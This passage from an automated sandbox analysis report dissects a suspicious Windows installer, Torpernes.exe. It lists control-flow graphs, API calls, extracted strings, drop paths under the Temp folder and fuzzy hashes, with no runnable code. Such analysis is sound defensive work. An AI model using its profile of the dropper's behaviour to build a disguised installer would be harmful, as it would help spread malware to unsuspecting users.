833->835 841 4063f3-406403 GlobalAlloc 834->841 842 4063ea-4063ed GlobalFree 834->842 835->826 836->814 843 406644 836->843 837->838 838->796 844 406390 838->844 839->828 840->839 840->840 841->796 841->835 842->841 846 406c84-406c8e 843->846 847 4065ca-4065e2 843->847 844->831 846->794 847->814
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8c71c6a85ea4b56a883c261abf5bbd6a62847571a0119542d059843241491b75
                                            • Instruction ID: ae9914dfc4ac9262e96535a7831571a61538a3842dbab95f7124da8c3de4ab96
                                            • Opcode Fuzzy Hash: 8c71c6a85ea4b56a883c261abf5bbd6a62847571a0119542d059843241491b75
                                            • Instruction Fuzzy Hash: 5DF17470D00269CBDF28CFA8C8946ADBBB0FF44305F25856ED856BB281D3385A96CF44
                                            Function 00406183 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,?,00000020,00403242,00000009), ref: 00406195
                                            • LoadLibraryA.KERNELBASE(?,?,00000020,00403242,00000009), ref: 004061A0
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004061B1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: AddressHandleLibraryLoadModuleProc
                                            • String ID:
                                            • API String ID: 310444273-0
                                            • Opcode ID: 9fd8a9fe8f036a5891475527ba8adc4fecc6861406a6458080dad13fdc4695bd
                                            • Instruction ID: d59e4f76ea54ee6613c1ff2f51ee10f72fe9a31321e3e9c366c23c5334b73836
                                            • Opcode Fuzzy Hash: 9fd8a9fe8f036a5891475527ba8adc4fecc6861406a6458080dad13fdc4695bd
                                            • Instruction Fuzzy Hash: 34E0CD32A081205BD7114B20AD4497773ACAFAD6513090439F946F61C0C774AC11DBA9
                                            Function 0040615C Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindFirstFileW.KERNELBASE(?,00425700,00424EB8,004059B5,00424EB8,00424EB8,00000000,00424EB8,00424EB8,?,?,74DF3420,004056C1,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00406167
                                            • FindClose.KERNEL32(00000000), ref: 00406173
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID:
                                            • API String ID: 2295610775-0
                                            • Opcode ID: 54be26efcda8f8bc2bf431c8d080f48db8f5fcc922e20f0f7d49f1037f8b3b84
                                            • Instruction ID: d2aa42ffe149e5aa11787ac58577a942bceb9626eff865f42483859dd930ae1e
                                            • Opcode Fuzzy Hash: 54be26efcda8f8bc2bf431c8d080f48db8f5fcc922e20f0f7d49f1037f8b3b84
                                            • Instruction Fuzzy Hash: A7D012319490309BC2015B787D0CC5B7AB8AF553307614A72F426F63F0C3389C66869D
                                            Function 004037AC Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216stringregistrylibraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 174 4037ac-4037c4 call 406183 177 4037c6-4037d6 call 405d60 174->177 178 4037d8-40380f call 405ce6 174->178 185 403832-40385b call 403a82 call 40596c 177->185 183 403811-403822 call 405ce6 178->183 184 403827-40382d lstrcatW 178->184 183->184 184->185 192 403861-403866 185->192 193 4038ed-4038f5 call 40596c 185->193 192->193 194 40386c-403894 call 405ce6 192->194 199 403903-403928 LoadImageW 193->199 200 4038f7-4038fe call 405e3b 193->200 194->193 201 403896-40389a 194->201 203 4039a9-4039b1 call 40140b 199->203 204 40392a-40395a RegisterClassW 199->204 200->199 206 4038ac-4038b8 lstrlenW 201->206 207 40389c-4038a9 call 405891 201->207 216 4039b3-4039b6 203->216 217 4039bb-4039c6 call 403a82 203->217 208 403960-4039a4 SystemParametersInfoW CreateWindowExW 204->208 209 403a78 204->209 213 4038e0-4038e8 call 405864 call 405e19 206->213 214 4038ba-4038c8 lstrcmpiW 206->214 207->206 208->203 211 403a7a-403a81 209->211 213->193 214->213 215 4038ca-4038d4 GetFileAttributesW 214->215 220 4038d6-4038d8 215->220 221 4038da-4038db call 4058b0 215->221 216->211 227 4039cc-4039e9 ShowWindow LoadLibraryW 217->227 228 403a4f-403a50 call 405194 217->228 220->213 220->221 221->213 230 4039f2-403a04 GetClassInfoW 227->230 231 4039eb-4039f0 LoadLibraryW 227->231 232 403a55-403a57 228->232 233 403a06-403a16 GetClassInfoW RegisterClassW 230->233 234 403a1c-403a3f DialogBoxParamW call 40140b 230->234 231->230 235 403a71-403a73 call 40140b 232->235 236 403a59-403a5f 232->236 233->234 240 403a44-403a4d call 4036fc 234->240 235->209 236->216 238 403a65-403a6c call 40140b 236->238 238->216 240->211
                                            APIs
                                              • Part of subcall function 00406183: GetModuleHandleA.KERNEL32(?,?,00000020,00403242,00000009), ref: 00406195
                                              • Part of subcall function 00406183: LoadLibraryA.KERNELBASE(?,?,00000020,00403242,00000009), ref: 004061A0
                                              • Part of subcall function 00406183: GetProcAddress.KERNEL32(00000000,?), ref: 004061B1
                                            • lstrcatW.KERNEL32(1033,004226B0), ref: 0040382D
                                            • lstrlenW.KERNEL32(Execute: ,?,?,?,Execute: ,00000000,C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes,1033,004226B0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226B0,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 004038AD
                                            • lstrcmpiW.KERNEL32(?,.exe,Execute: ,?,?,?,Execute: ,00000000,C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes,1033,004226B0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226B0,00000000), ref: 004038C0
                                            • GetFileAttributesW.KERNEL32(Execute: ), ref: 004038CB
                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes), ref: 00403914
                                              • Part of subcall function 00405D60: wsprintfW.USER32 ref: 00405D6D
                                            • RegisterClassW.USER32(00428160), ref: 00403951
                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403969
                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040399E
                                            • ShowWindow.USER32(00000005,00000000), ref: 004039D4
                                            • LoadLibraryW.KERNELBASE(RichEd20), ref: 004039E5
                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 004039F0
                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00428160), ref: 00403A00
                                            • GetClassInfoW.USER32(00000000,RichEdit,00428160), ref: 00403A0D
                                            • RegisterClassW.USER32(00428160), ref: 00403A16
                                            • DialogBoxParamW.USER32(?,00000000,00403B4F,00000000), ref: 00403A35
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: "C:\Users\user\Desktop\Torpernes.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes$Control Panel\Desktop\ResourceLocale$Execute: $RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                            • API String ID: 914957316-1804975888
                                            • Opcode ID: 27e933666a5dd111bd57d2a66a215dc62cf51cbb1b42b3929541858357a70e56
                                            • Instruction ID: 14839756d10fa0731cf70e8e297f409d05a37e9ae1d242a0fae1affd4733ed22
                                            • Opcode Fuzzy Hash: 27e933666a5dd111bd57d2a66a215dc62cf51cbb1b42b3929541858357a70e56
                                            • Instruction Fuzzy Hash: FA61C771604200BEE320AF669D46F3B3A6CEB84745F40457FF941B62E2D7796D12CA2D
                                            Function 00403B4F Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 245 403b4f-403b61 246 403ca2-403cb1 245->246 247 403b67-403b6d 245->247 249 403d00-403d15 246->249 250 403cb3-403cee GetDlgItem * 2 call 404027 KiUserCallbackDispatcher call 40140b 246->250 247->246 248 403b73-403b7c 247->248 251 403b91-403b94 248->251 252 403b7e-403b8b SetWindowPos 248->252 254 403d55-403d5a call 404073 249->254 255 403d17-403d1a 249->255 272 403cf3-403cfb 250->272 256 403b96-403ba8 ShowWindow 251->256 257 403bae-403bb4 251->257 252->251 262 403d5f-403d7a 254->262 259 403d1c-403d27 call 401389 255->259 260 403d4d-403d4f 255->260 256->257 263 403bd0-403bd3 257->263 264 403bb6-403bcb DestroyWindow 257->264 259->260 282 403d29-403d48 SendMessageW 259->282 260->254 267 403ff4 260->267 268 403d83-403d89 262->268 269 403d7c-403d7e call 40140b 262->269 273 403bd5-403be1 SetWindowLongW 263->273 274 403be6-403bec 263->274 271 403fd1-403fd7 264->271 270 403ff6-403ffd 267->270 278 403fb2-403fcb DestroyWindow EndDialog 268->278 279 403d8f-403d9a 268->279 269->268 271->267 276 403fd9-403fdf 271->276 272->249 273->270 280 403bf2-403c03 GetDlgItem 274->280 281 403c8f-403c9d call 40408e 274->281 276->267 283 403fe1-403fea ShowWindow 276->283 278->271 279->278 284 403da0-403ded call 405e3b call 404027 * 3 GetDlgItem 279->284 285 403c22-403c25 280->285 286 403c05-403c1c SendMessageW IsWindowEnabled 280->286 281->270 282->270 283->267 315 403df7-403e33 ShowWindow KiUserCallbackDispatcher call 404049 EnableWindow 284->315 316 403def-403df4 284->316 290 403c27-403c28 285->290 291 403c2a-403c2d 285->291 286->267 286->285 293 403c58-403c5d call 404000 290->293 294 403c3b-403c40 291->294 295 403c2f-403c35 291->295 293->281 296 403c42-403c48 294->296 297 403c76-403c89 SendMessageW 294->297 295->297 300 403c37-403c39 295->300 301 403c4a-403c50 call 40140b 296->301 302 403c5f-403c68 call 40140b 296->302 297->281 300->293 311 403c56 301->311 302->281 312 403c6a-403c74 302->312 311->293 312->311 319 403e35-403e36 315->319 320 403e38 315->320 316->315 321 403e3a-403e68 GetSystemMenu EnableMenuItem SendMessageW 319->321 320->321 322 403e6a-403e7b SendMessageW 321->322 323 403e7d 321->323 324 403e83-403ec1 call 40405c call 405e19 lstrlenW call 405e3b SetWindowTextW call 401389 322->324 323->324 324->262 333 403ec7-403ec9 324->333 333->262 334 403ecf-403ed3 333->334 335 403ef2-403f06 DestroyWindow 334->335 336 403ed5-403edb 334->336 335->271 338 403f0c-403f39 CreateDialogParamW 335->338 336->267 337 403ee1-403ee7 336->337 337->262 339 403eed 337->339 338->271 340 403f3f-403f96 call 404027 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 338->340 339->267 340->267 345 403f98-403fab ShowWindow call 404073 340->345 347 403fb0 345->347 347->271
                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B8B
                                            • ShowWindow.USER32(?), ref: 00403BA8
                                            • DestroyWindow.USER32 ref: 00403BBC
                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403BD8
                                            • GetDlgItem.USER32(?,?), ref: 00403BF9
                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403C0D
                                            • IsWindowEnabled.USER32(00000000), ref: 00403C14
                                            • GetDlgItem.USER32(?,00000001), ref: 00403CC2
                                            • GetDlgItem.USER32(?,00000002), ref: 00403CCC
                                            • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00403CE6
                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403D37
                                            • GetDlgItem.USER32(?,00000003), ref: 00403DDD
                                            • ShowWindow.USER32(00000000,?), ref: 00403DFE
                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E10
                                            • EnableWindow.USER32(?,?), ref: 00403E2B
                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E41
                                            • EnableMenuItem.USER32(00000000), ref: 00403E48
                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403E60
                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403E73
                                            • lstrlenW.KERNEL32(004226B0,?,004226B0,004281C0), ref: 00403E9C
                                            • SetWindowTextW.USER32(?,004226B0), ref: 00403EB0
                                            • ShowWindow.USER32(?,0000000A), ref: 00403FE4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                                            • String ID:
                                            • API String ID: 3906175533-0
                                            • Opcode ID: dc130b5ab879d2699cc5d0cd022503f708d91a6829be0c28cdee963fb22348d1
                                            • Instruction ID: 6759c50de97d02af1a732a3037a26d6f84778d3e6bb250328ac64ecb706e7fc3
                                            • Opcode Fuzzy Hash: dc130b5ab879d2699cc5d0cd022503f708d91a6829be0c28cdee963fb22348d1
                                            • Instruction Fuzzy Hash: C3C18C71A04205BBEB306F21ED85E3B3A6DFB45706F40053EF641B11E1CA79A9529B2E
                                            Function 00402D69 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 348 402d69-402db7 GetTickCount GetModuleFileNameW call 405a85 351 402dc3-402df1 call 405e19 call 4058b0 call 405e19 GetFileSize 348->351 352 402db9-402dbe 348->352 360 402df7 351->360 361 402ede-402eec call 402d05 351->361 353 402f9b-402f9f 352->353 362 402dfc-402e13 360->362 368 402f41-402f46 361->368 369 402eee-402ef1 361->369 364 402e15 362->364 365 402e17-402e20 call 40319e 362->365 364->365 374 402e26-402e2d 365->374 375 402f48-402f50 call 402d05 365->375 368->353 370 402ef3-402f0b call 4031b4 call 40319e 369->370 371 402f15-402f3f GlobalAlloc call 4031b4 call 402fa2 369->371 370->368 394 402f0d-402f13 370->394 371->368 399 402f52-402f63 371->399 378 402ea9-402ead 374->378 379 402e2f-402e43 call 405a40 374->379 375->368 383 402eb7-402ebd 378->383 384 402eaf-402eb6 call 402d05 378->384 379->383 397 402e45-402e4c 379->397 390 402ecc-402ed6 383->390 391 402ebf-402ec9 call 406231 383->391 384->383 390->362 398 402edc 390->398 391->390 394->368 394->371 397->383 403 402e4e-402e55 397->403 398->361 400 402f65 399->400 401 402f6b-402f70 399->401 400->401 404 402f71-402f77 401->404 403->383 405 402e57-402e5e 403->405 404->404 406 402f79-402f94 SetFilePointer call 405a40 404->406 405->383 407 402e60-402e67 405->407 410 402f99 406->410 407->383 409 402e69-402e89 407->409 409->368 411 402e8f-402e93 409->411 410->353 412 402e95-402e99 411->412 413 402e9b-402ea3 411->413 412->398 412->413 413->383 414 402ea5-402ea7 413->414 414->383
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402D7A
                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Torpernes.exe,00000400,?,?,?,00000000,00403455,?), ref: 00402D96
                                              • Part of subcall function 00405A85: GetFileAttributesW.KERNELBASE(00000003,00402DA9,C:\Users\user\Desktop\Torpernes.exe,80000000,00000003,?,?,?,00000000,00403455,?), ref: 00405A89
                                              • Part of subcall function 00405A85: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403455,?), ref: 00405AAB
                                            • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Torpernes.exe,C:\Users\user\Desktop\Torpernes.exe,80000000,00000003,?,?,?,00000000,00403455,?), ref: 00402DE2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                            • String ID: "C:\Users\user\Desktop\Torpernes.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Torpernes.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$h~A$soft
                                            • API String ID: 4283519449-1272592482
                                            • Opcode ID: be9c577222032539ca00076b9b0d13d710c4131359823756f8ef4ea21b3a53bf
                                            • Instruction ID: 9f10899fc39ddd59763a437958ebfb3d319deb30ea47bf766ee46431d43f5b69
                                            • Opcode Fuzzy Hash: be9c577222032539ca00076b9b0d13d710c4131359823756f8ef4ea21b3a53bf
                                            • Instruction Fuzzy Hash: 3E51F871940215ABDB209F65DE89BAF7AB4EB44358F14403BF904F62D1C7B88D818BAD
                                            Function 00402FA2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 166fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 541 402fa2-402fb9 542 402fc2-402fca 541->542 543 402fbb 541->543 544 402fd1-402fd6 542->544 545 402fcc 542->545 543->542 546 402fe6-402ff3 call 40319e 544->546 547 402fd8-402fe1 call 4031b4 544->547 545->544 551 403149 546->551 552 402ff9-402ffd 546->552 547->546 555 40314b-40314c 551->555 553 403132-403134 552->553 554 403003-403023 GetTickCount call 40629f 552->554 556 403136-403139 553->556 557 403189-40318d 553->557 565 403194 554->565 567 403029-403031 554->567 559 403197-40319b 555->559 562 40313b 556->562 563 40313e-403147 call 40319e 556->563 560 40314e-403154 557->560 561 40318f 557->561 568 403156 560->568 569 403159-403167 call 40319e 560->569 561->565 562->563 563->551 575 403191 563->575 565->559 572 403033 567->572 573 403036-403044 call 40319e 567->573 568->569 569->551 577 403169-40317c WriteFile 569->577 572->573 573->551 579 40304a-403053 573->579 575->565 580 40312e-403130 577->580 581 40317e-403181 577->581 582 403059-403076 call 4062bf 579->582 580->555 581->580 583 403183-403186 581->583 586 40312a-40312c 582->586 587 40307c-403093 GetTickCount 582->587 583->557 586->555 588 403095-40309d 587->588 589 4030de-4030e2 587->589 590 4030a5-4030d6 MulDiv wsprintfW call 4050c1 588->590 591 40309f-4030a3 588->591 592 4030e4-4030e7 589->592 593 40311f-403122 589->593 599 4030db 590->599 591->589 591->590 596 403107-40310d 592->596 597 4030e9-4030fb WriteFile 592->597 593->567 594 403128 593->594 594->565 598 403113-403117 596->598 597->580 600 4030fd-403100 597->600 598->582 601 40311d 598->601 599->589 600->580 602 403102-403105 600->602 601->565 602->598
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00403003
                                            • GetTickCount.KERNEL32 ref: 00403084
                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004030B1
                                            • wsprintfW.USER32 ref: 004030C4
                                            • WriteFile.KERNELBASE(00000000,00000000,0040FE60,7FFFFFFF,00000000), ref: 004030F3
                                            Strings
                                            • damebladets skips modeskaber trillingfdslers tilgodeskrevnelysforhold strofernes mbelfabrikants.forhoret straahattes almuemblernes,relaterede deratized overslight,tailordom faggoty allene unhushed nonavoidableness reallottingeufomaniens taletidens media., xrefs: 00402FCC
                                            • ... %d%%, xrefs: 004030BE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
